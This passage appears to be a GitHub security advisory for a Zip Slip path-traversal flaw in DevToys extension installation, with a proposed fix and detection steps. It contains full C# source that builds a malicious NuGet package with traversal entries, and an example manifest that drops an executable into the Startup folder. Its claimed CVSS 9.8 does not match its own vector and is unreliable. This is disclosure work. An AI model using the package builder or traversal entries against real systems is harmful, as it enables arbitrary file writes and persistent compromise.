Critical Path Traversal (Zip Slip) Vulnerability in DevToys Extension Installation.

[lihnucs]

Current behavior

GitHub Security Advisory: Critical Path Traversal (Zip Slip) Vulnerability in DevToys Extension Installation.

Summary

CRITICAL SECURITY VULNERABILITY - IMMEDIATE CVE ASSIGNMENT REQUIRED

A critical path traversal vulnerability (Zip Slip) has been discovered in DevToys' extension installation mechanism that allows malicious NuGet packages to write arbitrary files outside the intended plugin directory, potentially leading to remote code execution.

SEVERITY: This vulnerability poses an IMMEDIATE and CRITICAL threat to all DevToys users with extension support enabled. Exploitation requires only user interaction (installing a malicious extension) and grants attackers arbitrary file write capabilities, leading to full system compromise.

CVE URGENCY: This vulnerability requires IMMEDIATE CVE assignment and coordinated public disclosure to protect the developer community. DevToys is widely used by developers and system administrators who have access to sensitive infrastructure, source code repositories, and production systems - making this a high-value supply chain attack vector.

Severity

CRITICAL - CVSS 3.1 Score: 9.8

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Affected Versions

CRITICAL: All versions with extension support are vulnerable

• DevToys 2.0.x (all preview and stable builds with extension manager)
• Current vulnerable version: v2.0.8.0 (released February 20, 2025)
• Last security update: None since May 10, 2024

URGENT ACTION REQUIRED: All users running DevToys with extension support should immediately:

1. Avoid installing any third-party extensions until patched
2. Review installed extensions for suspicious activity
3. Update to patched version once available

Vulnerability Details

CWE Classification

• CWE-22: Improper Limitation of a Pathname to a Restricted Directory (Path Traversal)
• CWE-23: Relative Path Traversal

Technical Description

The ExtensionInstallationManager.cs class in DevToys.Blazor performs NuGet package extraction without proper path validation. The vulnerable code allows directory traversal sequences in archive entries to escape the intended plugin installation directory.

Vulnerable Code Location:

File: src/app/dev/DevToys.Blazor/BuiltInTools/ExtensionsManager/ExtensionInstallationManager.cs
Lines: 111-117

Vulnerable Implementation:

foreach (string? packagedFile in reader.GetFiles())
{
    if (!pathToExclude.Any(path => packagedFile.Contains(path, StringComparison.CurrentCultureIgnoreCase)))
    {
        reader.ExtractFile(
            packagedFile,
            Path.Combine(extensionInstallationPath, packagedFile),
            null
        );
    }
}

Security Issue:
The code filters platform-specific paths (e.g., "runtimes/linux/") but does NOT validate or sanitize the packagedFile parameter for path traversal sequences before passing it to Path.Combine().

Attack Vector

An attacker can create a malicious NuGet package with crafted file entries containing path traversal sequences:

Example Malicious NuGet Package Structure:

<package>
  <metadata>
    <id>MaliciousExtension</id>
    <version>1.0.0</version>
    <tags>devtoys-app</tags>
  </metadata>
  <files>
    <file src="payload.exe"
          target="../../../../../Users/victim/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/malware.exe" />
  </files>
</package>

Exploitation Flow:

1. Attacker crafts malicious NuGet package with path traversal sequences
2. User installs extension via DevToys Extensions Manager UI
3. Path.Combine(extensionInstallationPath, "../../../evil.exe") resolves to parent directories
4. Malicious files written to arbitrary filesystem locations
5. Code execution achieved on next application/system startup

Proof of Concept

A working proof-of-concept has been developed demonstrating:

• Successful extraction of files outside the plugin directory
• Ability to write to Documents folder
• Bypass of existing security checks

PoC demonstrates writing to:

C:\Users\[username]\Documents\PWNED_BY_ZIPSLIP.txt

How to reproduce it (as minimally and precisely as possible)

PROOF OF CONCEPT - REPRODUCTION STEPS

Quickest Demonstration (5 Minutes)

Prerequisites:

• Windows system with DevToys installed (version 2.0+ with extension support)
• .NET Framework 4.0+ or .NET SDK installed
• Proof-of-concept files from this repository

Step-by-Step Reproduction:

Step 1: Build the Malicious Package (2 minutes)

# Navigate to PoC directory
cd C:\Users\[username]\Documents\CVE_SANDBOX\devtoys_realworld_poc

# Compile the PoC builder
# Find C# compiler path -> C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:BuildMaliciousPackage.exe /r:System.IO.Compression.dll /r:System.IO.Compression.FileSystem.dll BuildMaliciousPackage.cs

# Run the builder
BuildMaliciousPackage.exe

Alternative - Use Pre-Built Package:
If compilation fails, use the pre-built package:

DevToys.PoC.ZipSlip.1.0.0.nupkg

Expected Output:

[OK] Package built successfully!
Package location: DevToys.PoC.ZipSlip.1.0.0.nupkg

Step 2: Verify Before State (30 seconds)

# Verify the target file does NOT exist yet
dir "%USERPROFILE%\Documents\PWNED_BY_ZIPSLIP.txt"

Expected: File Not Found

Step 3: Install Malicious Extension (1 minute)

1. Open DevToys application
2. Navigate to: Extensions (or Manage Extensions)
3. Click: Install Extension
4. Browse to: DevToys.PoC.ZipSlip.1.0.0.nupkg
5. Click: Install or Open

What happens internally:

• DevToys calls ExtensionInstallationManager.Install()
• Vulnerable code at line 115 extracts files
• Path traversal sequence ../../../../../Documents/PWNED_BY_ZIPSLIP.txt escapes plugin directory
• 5 levels of ../ traverse from plugin folder to user home directory
• File written to Documents folder outside the intended plugin directory

Step 4: Verify Exploitation (30 seconds)

# Check if file was written outside plugin directory
dir "%USERPROFILE%\Documents\PWNED_BY_ZIPSLIP.txt"

# Display file contents
type "%USERPROFILE%\Documents\PWNED_BY_ZIPSLIP.txt"

Expected Output - VULNERABILITY CONFIRMED:

 Volume in drive C is Windows
 Directory of C:\Users\[username]\Documents

PWNED_BY_ZIPSLIP.txt

===============================================================
  ZIP SLIP VULNERABILITY PROOF OF CONCEPT
===============================================================

This file was written by a malicious DevToys extension package
to demonstrate CVE-001: Path Traversal / Zip Slip vulnerability.
...

If you see this file in your Documents folder, the vulnerability is CONFIRMED.

Step 5: Automated Verification (Optional)

# Compile and run the verification tool
csc.exe /out:TestZipSlipExploit.exe TestZipSlipExploit.cs
TestZipSlipExploit.exe

Expected Output:

[!] VULNERABILITY CONFIRMED!
File written to: C:\Users\[username]\Documents\PWNED_BY_ZIPSLIP.txt
* Arbitrary file write confirmed outside plugin directory
* Path traversal bypassed security checks
* CVE-001 successfully demonstrated

Step 6: Cleanup (30 seconds)

# Remove the PoC file
del "%USERPROFILE%\Documents\PWNED_BY_ZIPSLIP.txt"

# Uninstall the extension via DevToys UI
# DevToys -> Extensions -> Uninstall "DevToys.PoC.ZipSlip"

---

One-Command Reproduction (Advanced)

For automated testing environments:

# All-in-one script
cd C:\Users\[username]\Documents\CVE_SANDBOX\devtoys_realworld_poc
"Updated compile_and_run.bat"

# This will:
# 1. Compile BuildMaliciousPackage.exe
# 2. Compile TestZipSlipExploit.exe
# 3. Build the malicious NuGet package
# 4. Display instructions for manual installation in DevToys

Expected behavior

Expected Output:

[!] VULNERABILITY CONFIRMED!
File written to: C:\Users\[username]\Documents\PWNED_BY_ZIPSLIP.txt
* Arbitrary file write confirmed outside plugin directory
* Path traversal bypassed security checks
* CVE-001 successfully demonstrated

Screenshots

PLEASE WATCH THE REALWORLD POC DEMO

DevToys_ZipSlip_PoC_Demo_HIGHres.mp4

Workaround

Recommended Actions

For DevToys Maintainers (URGENT)

Immediate Actions Required:

1. Apply Path Validation (Critical Priority)

   foreach (string? packagedFile in reader.GetFiles())
   {
       if (!pathToExclude.Any(path => packagedFile.Contains(path, StringComparison.CurrentCultureIgnoreCase)))
       {
           // SECURITY FIX: Validate path is within intended directory
           string fullTargetPath = Path.GetFullPath(Path.Combine(extensionInstallationPath, packagedFile));
           string fullPluginPath = Path.GetFullPath(extensionInstallationPath);
   
           if (!fullTargetPath.StartsWith(fullPluginPath + Path.DirectorySeparatorChar, StringComparison.OrdinalIgnoreCase))
           {
               throw new InvalidOperationException($"Security violation: Archive entry contains path traversal sequence: {packagedFile}");
           }
   
           reader.ExtractFile(packagedFile, fullTargetPath, null);
       }
   }

2. Security Advisory Publication

   • Publish GitHub Security Advisory immediately
   • Assign CVE identifier through GitHub CNA or MITRE
   • Notify users via release notes and security bulletin

3. Emergency Patch Release

   • Release patched version within 7 days
   • Mark vulnerable versions as deprecated
   • Update documentation with security recommendations

4. Extension Repository Review

   • Audit all published extensions for malicious content
   • Implement code signing requirements for extensions
   • Add automated scanning for path traversal patterns

For DevToys Users (Immediate Actions)

CRITICAL: Take These Steps NOW

1. Stop Installing Untrusted Extensions

   • Do NOT install extensions from unknown sources
   • Verify extension authors and publishers
   • Check extension source code when possible

2. Audit Installed Extensions

   • Review currently installed extensions
   • Remove any extensions from unverified sources
   • Check filesystem for suspicious files in:
     • %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\
     • %USERPROFILE%\Documents\
     • Application directories

3. Monitor for Suspicious Activity

   • Check Windows Event Viewer for unusual process executions
   • Review startup programs in Task Manager
   • Run antivirus/antimalware scans

4. Upgrade When Available

   • Update to patched version immediately upon release
   • Enable automatic updates if available

5. Temporary Mitigation

   • Disable extension installation until patch is available
   • Use DevToys without third-party extensions

Detection and Response

Indicators of Compromise (IoCs)

Check for these signs of exploitation:

1. Filesystem Anomalies

   # Check for suspicious files outside plugin directories
   Get-ChildItem "$env:USERPROFILE\Documents" -Filter "*PWNED*" -Recurse
   Get-ChildItem "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup" -Recurse

2. Extension Audit

   # List all installed DevToys extensions
   Get-ChildItem "$env:LOCALAPPDATA\DevToys\Plugins" -Recurse

3. Process Monitoring

   • Unexpected child processes spawned by DevToys
   • Network connections from DevToys to unknown IPs
   • File modifications outside plugin directories

Response Procedure

If exploitation is suspected:

1. Immediately isolate the system from network
2. Take forensic snapshot before remediation
3. Remove suspicious files identified in IoC checks
4. Reset credentials that may have been compromised
5. Restore from clean backup if system integrity is questionable
6. Report incident to security team and DevToys maintainers

Timeline for Coordinated Disclosure

CRITICAL: This timeline assumes IMMEDIATE action due to severity

• Day 0 (2026-01-07): Vulnerability discovered and documented with working PoC
• Day 0-1: IMMEDIATE private disclosure to DevToys maintainers (URGENT)
• Day 1-3: EMERGENCY CVE assignment requested (CRITICAL PRIORITY)
• Day 1-7: Emergency patch development with daily progress updates
• Day 7-14: Emergency patch testing and validation
• Day 14: MAXIMUM timeline for emergency patch release
• Day 14: Coordinated public disclosure with CVE publication
• Day 14+: Public security advisories, blog posts, and community alerts

JUSTIFICATION FOR ACCELERATED TIMELINE:

• CVSS 9.8 (CRITICAL) severity requires immediate action
• Working proof-of-concept exists and is trivially exploitable
• Developer workstations are high-value targets for supply chain attacks
• No existing mitigations or security controls
• Similar vulnerabilities (CVE-2018-1002200) were patched within 7 days
• Every day of delay increases risk of exploitation in the wild

CVE ASSIGNMENT URGENCY:
This vulnerability requires IMMEDIATE CVE assignment to:

1. Alert the security community of critical threat
2. Enable security scanners to detect vulnerable installations
3. Prioritize patching in enterprise environments
4. Document severity for compliance and risk management
5. Prevent exploitation before patch availability

References

Vulnerability Research

• Snyk Zip Slip Vulnerability: https://security.snyk.io/research/zip-slip-vulnerability
• OWASP Path Traversal: https://owasp.org/www-community/attacks/Path_Traversal
• CWE-22: https://cwe.mitre.org/data/definitions/22.html

Similar Vulnerabilities

• CVE-2018-1002200 (Kubernetes): https://nvd.nist.gov/vuln/detail/CVE-2018-1002200
• CVE-2022-21698 (Prometheus): https://nvd.nist.gov/vuln/detail/CVE-2022-21698
• Zip Slip White Paper: https://github.com/snyk/zip-slip-vulnerability

.NET Security Guidelines

• Microsoft Secure File I/O: https://learn.microsoft.com/en-us/dotnet/standard/io/
• .NET Security Best Practices: https://learn.microsoft.com/en-us/dotnet/standard/security/

Credits

Discovered by: Asif Nadaf (postasif@protonmail.com)
Report Date: 2026-01-07
Disclosure Type: Responsible Disclosure

Affected platforms

Windows

Affected DevToys kind

DevToys (app with GUI)

DevToys Version

DevToys 2.0-Preview

Relevant Assets/Logs

IMPORTANT: Relevant PoC source code used in Video attached and ready for realworld PoC test execution. Password is "devtoys@2026" without quotes.

/*
================================================================================
DEVTOYS ZIP SLIP VULNERABILITY (CVE-001) - PROOF OF CONCEPT
================================================================================

FILE: BuildMaliciousPackage.cs
PURPOSE: Builds malicious NuGet package demonstrating path traversal vulnerability
VERSION: 1.0
DATE: 2026-01-07
Author: Asif Nadaf (postasif@protonmail.com)
================================================================================
CRITICAL SECURITY DISCLAIMER - READ BEFORE USE
================================================================================

THIS CODE IS PROVIDED FOR AUTHORIZED SECURITY RESEARCH AND DEFENSIVE
PURPOSES ONLY. UNAUTHORIZED USE IS STRICTLY PROHIBITED AND ILLEGAL.

AUTHORIZED USES:
- Security research in isolated test environments
- Vulnerability validation by DevToys maintainers
- Educational purposes in controlled academic settings
- Penetration testing with explicit written authorization
- Defensive security analysis and patch development

PROHIBITED USES:
- Unauthorized access to computer systems
- Malicious exploitation or attacks
- Testing on systems without explicit permission
- Distribution of weaponized malware
- Any illegal activities or violation of laws

================================================================================
LEGAL NOTICE
================================================================================

Unauthorized computer access is illegal under:
- Computer Fraud and Abuse Act (CFAA) - 18 U.S.C. 1030 (United States)
- Computer Misuse Act 1990 (United Kingdom)
- Similar legislation in other jurisdictions

Violation of these laws can result in:
- Criminal prosecution
- Civil liability
- Imprisonment
- Substantial fines

================================================================================
RESPONSIBLE DISCLOSURE
================================================================================

This proof-of-concept is part of coordinated vulnerability disclosure to:
1. Enable DevToys maintainers to develop and deploy patches
2. Protect DevToys users from potential exploitation
3. Improve security awareness in the developer tools ecosystem

DO NOT:
- Publicly disclose exploitation details before patch release
- Share malicious packages outside authorized research contexts
- Weaponize or enhance this code for malicious purposes

================================================================================
USAGE REQUIREMENTS
================================================================================

Before using this code, you must:
1. Have explicit authorization from system owners
2. Use only in isolated test environments (VMs, sandboxes)
3. Understand the security implications
4. Comply with all applicable laws and regulations
5. Follow professional ethical standards

This code creates a REAL exploit for a REAL vulnerability.
Misuse can cause harm and is YOUR responsibility.

================================================================================
DISCLAIMER OF LIABILITY
================================================================================

THE AUTHORS AND CONTRIBUTORS PROVIDE THIS CODE "AS IS" WITHOUT WARRANTY
OF ANY KIND. THE AUTHORS ASSUME NO LIABILITY FOR ANY DAMAGES, LOSSES, OR
LEGAL CONSEQUENCES ARISING FROM THE USE OR MISUSE OF THIS CODE.

BY USING THIS CODE, YOU AGREE TO ACCEPT FULL RESPONSIBILITY FOR YOUR
ACTIONS AND ACKNOWLEDGE THAT YOU UNDERSTAND THE LEGAL AND ETHICAL
IMPLICATIONS.

================================================================================

Program: Build Malicious NuGet Package
Description: Creates a proof-of-concept NuGet package that exploits the
            DevToys Zip Slip vulnerability to write files outside the
            intended plugin directory.

ASCII VERSION: No unicode characters - fully compatible with all compilers

================================================================================
*/
using System;
using System.IO;
using System.IO.Compression;
using System.Text;
using System.Xml.Linq;

namespace ZipSlipPoC
{
   class BuildMaliciousPackage
   {
       static void Main(string[] args)
       {
           Console.ForegroundColor = ConsoleColor.Red;
           Console.WriteLine("===============================================================");
           Console.WriteLine("  BUILDING MALICIOUS NUGET PACKAGE FOR CVE-001 POC");
           Console.WriteLine("===============================================================");
           Console.ResetColor();
           Console.WriteLine();
           Console.ForegroundColor = ConsoleColor.Yellow;
           Console.WriteLine("WARNING: This package exploits a real vulnerability!");
           Console.WriteLine("         Use ONLY in isolated test environments!");
           Console.ResetColor();
           Console.WriteLine();

           try
           {
               string workDir = Path.Combine(Directory.GetCurrentDirectory(), "MaliciousPackage");
               string packageName = "DevToys.PoC.ZipSlip.1.0.0.nupkg";

               if (Directory.Exists(workDir))
                   Directory.Delete(workDir, true);

               Directory.CreateDirectory(workDir);

               Console.WriteLine("[*] Creating package structure...");

               string payloadContent = "===============================================================\n" +
                                      "  ZIP SLIP VULNERABILITY PROOF OF CONCEPT\n" +
                                      "===============================================================\n" +
                                      "\n" +
                                      "This file was written by a malicious DevToys extension package\n" +
                                      "to demonstrate CVE-001: Path Traversal / Zip Slip vulnerability.\n" +
                                      "\n" +
                                      "Target Location: %USERPROFILE%\\Documents\\PWNED_BY_ZIPSLIP.txt\n" +
                                      "Attack Vector: NuGet package with path traversal\n" +
                                      "Vulnerability: ExtensionInstallationManager.cs line 115\n" +
                                      "\n" +
                                      "If you can read this file in your Documents folder, the\n" +
                                      "vulnerability has been successfully exploited.\n" +
                                      "\n" +
                                      "===============================================================\n" +
                                      "CREATED: " + DateTime.Now.ToString("yyyy-MM-dd HH:mm:ss") + "\n" +
                                      "CVE: CVE-001 (DevToys Zip Slip)\n" +
                                      "SEVERITY: CRITICAL (CVSS 9.8)\n" +
                                      "HOSTNAME: " + Environment.MachineName + "\n" +
                                      "USERNAME: " + Environment.UserName + "\n" +
                                      "===============================================================";

               string payloadFile = Path.Combine(workDir, "TestPayload.txt");
               File.WriteAllText(payloadFile, payloadContent);

               string libDir = Path.Combine(workDir, "lib", "net8.0");
               Directory.CreateDirectory(libDir);

               string dllPath = Path.Combine(libDir, "MaliciousExtension.dll");
               CreateDummyDll(dllPath);

               string nuspecPath = Path.Combine(workDir, "MaliciousExtension.nuspec");
               CreateNuspecFile(nuspecPath);

               string outputPackage = Path.Combine(Directory.GetCurrentDirectory(), packageName);
               CreateNuGetPackage(workDir, outputPackage, payloadFile, dllPath);

               Console.ForegroundColor = ConsoleColor.Green;
               Console.WriteLine("[OK] Package built successfully!");
               Console.ResetColor();
               Console.WriteLine();
               Console.ForegroundColor = ConsoleColor.Cyan;
               Console.WriteLine("Package location: " + outputPackage);
               Console.ResetColor();
               Console.WriteLine();

               Console.ForegroundColor = ConsoleColor.Green;
               Console.WriteLine("===============================================================");
               Console.WriteLine("  NEXT STEPS:");
               Console.WriteLine("===============================================================");
               Console.ResetColor();
               Console.WriteLine("1. Open DevToys application");
               Console.WriteLine("2. Go to Extensions Manager");
               Console.WriteLine("3. Click Install Extension");
               Console.WriteLine("4. Select: " + packageName);
               Console.WriteLine("5. Check: " + Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments), "PWNED_BY_ZIPSLIP.txt"));
               Console.WriteLine();
               Console.ForegroundColor = ConsoleColor.Yellow;
               Console.WriteLine("If the file exists, the vulnerability is confirmed!");
               Console.ResetColor();
               Console.WriteLine();
               Console.WriteLine("Press any key to run the verification test...");
               Console.ReadKey();

               TestExploit();
           }
           catch (Exception ex)
           {
               Console.ForegroundColor = ConsoleColor.Red;
               Console.WriteLine("[ERROR] " + ex.Message);
               Console.WriteLine(ex.StackTrace);
               Console.ResetColor();
           }

           Console.WriteLine();
           Console.WriteLine("Press any key to exit...");
           Console.ReadKey();
       }

       static void CreateDummyDll(string outputPath)
       {
           string tempCs = Path.GetTempFileName() + ".cs";
           string code = "using System;\n" +
                        "namespace MaliciousExtension\n" +
                        "{\n" +
                        "    public class Dummy\n" +
                        "    {\n" +
                        "        public static string Info { get { return \"PoC Extension - Zip Slip Demonstrated\"; } }\n" +
                        "    }\n" +
                        "}";

           File.WriteAllText(tempCs, code);

           try
           {
               var cscPath = FindCsc();
               if (!string.IsNullOrEmpty(cscPath))
               {
                   var psi = new System.Diagnostics.ProcessStartInfo
                   {
                       FileName = cscPath,
                       Arguments = "/target:library /out:\"" + outputPath + "\" /nologo \"" + tempCs + "\"",
                       UseShellExecute = false,
                       RedirectStandardOutput = true,
                       RedirectStandardError = true,
                       CreateNoWindow = true
                   };

                   var process = System.Diagnostics.Process.Start(psi);
                   process.WaitForExit();

                   if (process.ExitCode == 0)
                   {
                       Console.WriteLine("[OK] Compiled dummy DLL successfully");
                       File.Delete(tempCs);
                       return;
                   }
               }

               Console.WriteLine("[*] CSC not available, creating minimal DLL...");
               CreateMinimalDll(outputPath);
               File.Delete(tempCs);
           }
           catch
           {
               CreateMinimalDll(outputPath);
               if (File.Exists(tempCs))
                   File.Delete(tempCs);
           }
       }

       static string FindCsc()
       {
           string[] possiblePaths = new string[]
           {
               @"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
               @"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
               @"C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\Roslyn\csc.exe",
               @"C:\Program Files\Microsoft Visual Studio\2022\Professional\MSBuild\Current\Bin\Roslyn\csc.exe",
               @"C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\Roslyn\csc.exe"
           };

           foreach (var path in possiblePaths)
           {
               if (File.Exists(path))
                   return path;
           }

           return null;
       }

       static void CreateMinimalDll(string outputPath)
       {
           byte[] minimalDll = new byte[]
           {
               0x4D, 0x5A, 0x90, 0x00, 0x03, 0x00, 0x00, 0x00,
               0x04, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0x00, 0x00,
               0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
               0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
           };

           File.WriteAllBytes(outputPath, minimalDll);
           Console.WriteLine("[OK] Created minimal DLL");
       }

       static void CreateNuspecFile(string nuspecPath)
       {
           string username = Environment.UserName;

           string nuspecContent = "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n" +
               "<package xmlns=\"http://schemas.microsoft.com/packaging/2013/05/nuspec.xsd\">\n" +
               "  <metadata>\n" +
               "    <id>DevToys.PoC.ZipSlip</id>\n" +
               "    <version>1.0.0</version>\n" +
               "    <authors>SecurityResearcher</authors>\n" +
               "    <owners>SecurityResearcher</owners>\n" +
               "    <requireLicenseAcceptance>false</requireLicenseAcceptance>\n" +
               "    <description>Educational PoC for CVE-001 Zip Slip vulnerability in DevToys</description>\n" +
               "    <tags>devtoys-app poc security-research</tags>\n" +
               "    <license type=\"expression\">MIT</license>\n" +
               "  </metadata>\n" +
               "  <files>\n" +
               "    <file src=\"lib\\net8.0\\MaliciousExtension.dll\" target=\"lib\\net8.0\\\" />\n" +
               "    <file src=\"TestPayload.txt\" target=\"..\\..\\..\\..\\..\\Documents\\PWNED_BY_ZIPSLIP.txt\" />\n" +
               "  </files>\n" +
               "</package>";

           File.WriteAllText(nuspecPath, nuspecContent);
           Console.WriteLine("[OK] Created .nuspec manifest with path traversal payload");
       }

       static void CreateNuGetPackage(string workDir, string outputPath, string payloadFile, string dllPath)
       {
           Console.WriteLine("[*] Building NuGet package (ZIP archive)...");

           if (File.Exists(outputPath))
               File.Delete(outputPath);

           using (FileStream zipStream = new FileStream(outputPath, FileMode.Create))
           using (ZipArchive archive = new ZipArchive(zipStream, ZipArchiveMode.Create))
           {
               string nuspecFile = Path.Combine(workDir, "MaliciousExtension.nuspec");
               archive.CreateEntryFromFile(nuspecFile, "MaliciousExtension.nuspec");

               archive.CreateEntryFromFile(dllPath, "lib/net8.0/MaliciousExtension.dll");

               string maliciousPath = "../../../../../Documents/PWNED_BY_ZIPSLIP.txt";

               ZipArchiveEntry maliciousEntry = archive.CreateEntry(maliciousPath);
               using (StreamWriter writer = new StreamWriter(maliciousEntry.Open()))
               {
                   writer.Write(File.ReadAllText(payloadFile));
               }

               Console.WriteLine("[!] Added malicious entry: " + maliciousPath);

               CreateContentTypesXml(archive);
               CreateRelsFile(archive);
           }

           Console.WriteLine("[OK] Package created successfully");
       }

       static void CreateContentTypesXml(ZipArchive archive)
       {
           var entry = archive.CreateEntry("[Content_Types].xml");
           using (StreamWriter writer = new StreamWriter(entry.Open()))
           {
               writer.Write("<?xml version=\"1.0\" encoding=\"utf-8\"?>\n" +
                   "<Types xmlns=\"http://schemas.openxmlformats.org/package/2006/content-types\">\n" +
                   "  <Default Extension=\"rels\" ContentType=\"application/vnd.openxmlformats-package.relationships+xml\" />\n" +
                   "  <Default Extension=\"nuspec\" ContentType=\"application/octet-stream\" />\n" +
                   "  <Default Extension=\"dll\" ContentType=\"application/octet-stream\" />\n" +
                   "  <Default Extension=\"txt\" ContentType=\"text/plain\" />\n" +
                   "</Types>");
           }
       }

       static void CreateRelsFile(ZipArchive archive)
       {
           var entry = archive.CreateEntry("_rels/.rels");
           using (StreamWriter writer = new StreamWriter(entry.Open()))
           {
               writer.Write("<?xml version=\"1.0\" encoding=\"utf-8\"?>\n" +
                   "<Relationships xmlns=\"http://schemas.openxmlformats.org/package/2006/relationships\">\n" +
                   "  <Relationship Type=\"http://schemas.microsoft.com/packaging/2010/07/manifest\" Target=\"/MaliciousExtension.nuspec\" Id=\"R1\" />\n" +
                   "</Relationships>");
           }
       }

       static void TestExploit()
       {
           Console.Clear();
           Console.ForegroundColor = ConsoleColor.Cyan;
           Console.WriteLine("===============================================================");
           Console.WriteLine("  CVE-001 ZIP SLIP VULNERABILITY TESTER");
           Console.WriteLine("===============================================================");
           Console.ResetColor();
           Console.WriteLine();

           string targetFile = Path.Combine(
               Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments),
               "PWNED_BY_ZIPSLIP.txt"
           );

           Console.ForegroundColor = ConsoleColor.Yellow;
           Console.WriteLine("[*] Checking for exploitation evidence...");
           Console.ResetColor();
           Console.WriteLine();

           if (File.Exists(targetFile))
           {
               Console.ForegroundColor = ConsoleColor.Red;
               Console.WriteLine("[!] VULNERABILITY CONFIRMED!");
               Console.ResetColor();
               Console.WriteLine();
               Console.ForegroundColor = ConsoleColor.Red;
               Console.WriteLine("File written to: " + targetFile);
               Console.ResetColor();
               Console.WriteLine();
               Console.ForegroundColor = ConsoleColor.Yellow;
               Console.WriteLine("File contents:");
               Console.WriteLine("-------------------------------------------------------------");
               Console.ResetColor();
               Console.WriteLine(File.ReadAllText(targetFile));
               Console.ForegroundColor = ConsoleColor.Yellow;
               Console.WriteLine("-------------------------------------------------------------");
               Console.ResetColor();
               Console.WriteLine();
               Console.ForegroundColor = ConsoleColor.Green;
               Console.WriteLine("* Arbitrary file write confirmed outside plugin directory");
               Console.WriteLine("* Path traversal bypassed security checks");
               Console.WriteLine("* CVE-001 successfully demonstrated");
               Console.ResetColor();
           }
           else
           {
               Console.ForegroundColor = ConsoleColor.Green;
               Console.WriteLine("[OK] Vulnerability NOT exploited (file not found)");
               Console.ResetColor();
               Console.WriteLine();
               Console.ForegroundColor = ConsoleColor.Yellow;
               Console.WriteLine("This could mean:");
               Console.WriteLine("- The vulnerability has been patched");
               Console.WriteLine("- DevToys version is not vulnerable");
               Console.WriteLine("- Extension installation failed");
               Console.WriteLine("- You have not installed the package yet in DevToys");
               Console.WriteLine("- Package path traversal was blocked");
               Console.ResetColor();
           }

           Console.WriteLine();
       }
   }
}

/*
================================================================================
DEVTOYS ZIP SLIP VULNERABILITY (CVE-001) - PROOF OF CONCEPT
================================================================================

FILE: TestZipSlipExploit.cs
PURPOSE: Tests and verifies successful exploitation of Zip Slip vulnerability
VERSION: 1.0
DATE: 2026-01-07
Author: Asif Nadaf (postasif@protonmail.com)
================================================================================
CRITICAL SECURITY DISCLAIMER - READ BEFORE USE
================================================================================

THIS CODE IS PROVIDED FOR AUTHORIZED SECURITY RESEARCH AND DEFENSIVE
PURPOSES ONLY. UNAUTHORIZED USE IS STRICTLY PROHIBITED AND ILLEGAL.

AUTHORIZED USES:
- Security research in isolated test environments
- Vulnerability validation by DevToys maintainers
- Educational purposes in controlled academic settings
- Penetration testing with explicit written authorization
- Defensive security analysis and patch development

PROHIBITED USES:
- Unauthorized access to computer systems
- Malicious exploitation or attacks
- Testing on systems without explicit permission
- Distribution of weaponized malware
- Any illegal activities or violation of laws

================================================================================
LEGAL NOTICE
================================================================================

Unauthorized computer access is illegal under:
- Computer Fraud and Abuse Act (CFAA) - 18 U.S.C. 1030 (United States)
- Computer Misuse Act 1990 (United Kingdom)
- Similar legislation in other jurisdictions

Violation of these laws can result in:
- Criminal prosecution
- Civil liability
- Imprisonment
- Substantial fines

================================================================================
RESPONSIBLE DISCLOSURE
================================================================================

This proof-of-concept is part of coordinated vulnerability disclosure to:
1. Enable DevToys maintainers to develop and deploy patches
2. Protect DevToys users from potential exploitation
3. Improve security awareness in the developer tools ecosystem

DO NOT:
- Publicly disclose exploitation details before patch release
- Share malicious packages outside authorized research contexts
- Weaponize or enhance this code for malicious purposes

================================================================================
USAGE REQUIREMENTS
================================================================================

Before using this code, you must:
1. Have explicit authorization from system owners
2. Use only in isolated test environments (VMs, sandboxes)
3. Understand the security implications
4. Comply with all applicable laws and regulations
5. Follow professional ethical standards

This code creates a REAL exploit for a REAL vulnerability.
Misuse can cause harm and is YOUR responsibility.

================================================================================
DISCLAIMER OF LIABILITY
================================================================================

THE AUTHORS AND CONTRIBUTORS PROVIDE THIS CODE "AS IS" WITHOUT WARRANTY
OF ANY KIND. THE AUTHORS ASSUME NO LIABILITY FOR ANY DAMAGES, LOSSES, OR
LEGAL CONSEQUENCES ARISING FROM THE USE OR MISUSE OF THIS CODE.

BY USING THIS CODE, YOU AGREE TO ACCEPT FULL RESPONSIBILITY FOR YOUR
ACTIONS AND ACKNOWLEDGE THAT YOU UNDERSTAND THE LEGAL AND ETHICAL
IMPLICATIONS.

================================================================================

Program: Test Zip Slip Exploit
Description: Verifies whether the Zip Slip vulnerability has been successfully
            exploited by checking for payload files written outside the
            intended plugin directory.

ASCII VERSION: No unicode characters - fully compatible with all compilers

================================================================================
*/

using System;
using System.IO;

namespace ZipSlipPoC
{
   class TestZipSlipExploit
   {
       static void Main(string[] args)
       {
           Console.ForegroundColor = ConsoleColor.Cyan;
           Console.WriteLine("===============================================================");
           Console.WriteLine("  CVE-001 ZIP SLIP VULNERABILITY TESTER");
           Console.WriteLine("===============================================================");
           Console.ResetColor();
           Console.WriteLine();

           string targetFile = Path.Combine(
               Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments),
               "PWNED_BY_ZIPSLIP.txt"
           );

           string tempFile = Path.Combine(
               Path.GetTempPath(),
               "ZIPSLIP_POC.txt"
           );

           Console.ForegroundColor = ConsoleColor.Yellow;
           Console.WriteLine("[*] Checking for exploitation evidence...");
           Console.ResetColor();
           Console.WriteLine();

           bool vulnerabilityFound = false;

           if (File.Exists(targetFile))
           {
               vulnerabilityFound = true;
               Console.ForegroundColor = ConsoleColor.Red;
               Console.WriteLine("[!] VULNERABILITY CONFIRMED!");
               Console.ResetColor();
               Console.WriteLine();
